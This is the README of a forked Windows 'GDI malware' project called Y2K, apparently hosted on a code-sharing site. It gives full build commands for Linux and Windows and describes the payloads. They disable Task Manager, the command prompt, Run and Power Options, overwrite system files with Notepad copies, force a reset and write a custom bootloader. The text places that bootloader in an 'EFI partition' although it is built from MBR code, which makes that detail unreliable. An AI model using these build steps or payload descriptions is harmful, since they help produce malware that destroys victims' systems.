README.org
Y2K GDI Malware
A fork of malware created by Jotaxisz with a reworked source structure (minor changes).
To run this malware you need a Windows XP machine with the date set to <2000-01-01 Sat> or <2000-01-02 Sun>; the date selects which payload runs.
Building
On Linux
You will need MinGW and Make. You can pass the CXX argument to change the C++ compiler (the default is i686-w64-mingw-g++) and the WINDRES argument to change the default windres command (the default is i686-w64-mingw-windres).
Other arguments are NASM and LD for changing the nasm and ld commands.
You can change CXX, WINDRES and LD to x86_64-w64-mingw-g++, x86_64-w64-mingw-windres and x86_64-w64-mingw32-ld respectively to build it natively for 64-bit environments.
Arch Linux:
pacman -S make mingw-w64 nasm
make
Ubuntu:
apt install make mingw-w64 nasm
make
You can also run make clean to clean the bin/ folder, the .o files in res/, and the .bin and .o files in mbr/.
On Windows
You will need to install MinGW or another C++ compiler and NASM. Then run the following commands:
windres -o res\resource.o res\resource.rc
nasm -o mbr\bootloader.bin mbr\bootloader.asm
ld -r -b binary -o mbr\bootloader.o mbr\bootloader.bin
g++ src\* res\resource.o mbr\bootloader.o -static -l gdi32 -l winmm -o Y2K
Bootloader
This project has a void function, byeByeBoot, in its namespace; this function loads the custom bootloader code and writes it to the EFI partition. The source code of the bootloader binary can be found here.
Payloads
If you execute the malware on any date, it will always disable the Task Manager, CMD, Execute and Power Options.
<2000-01-01 Sat>
This payload will play res/alarm.wav and then start the GDI part, replacing multiple system files with copies of the Notepad executable. After the visual payload ends, the machine is forcibly reset and the bootloader payload starts.
<2000-01-02 Sun>
This payload will play res/jeff_syndicate_hip_hop.wav.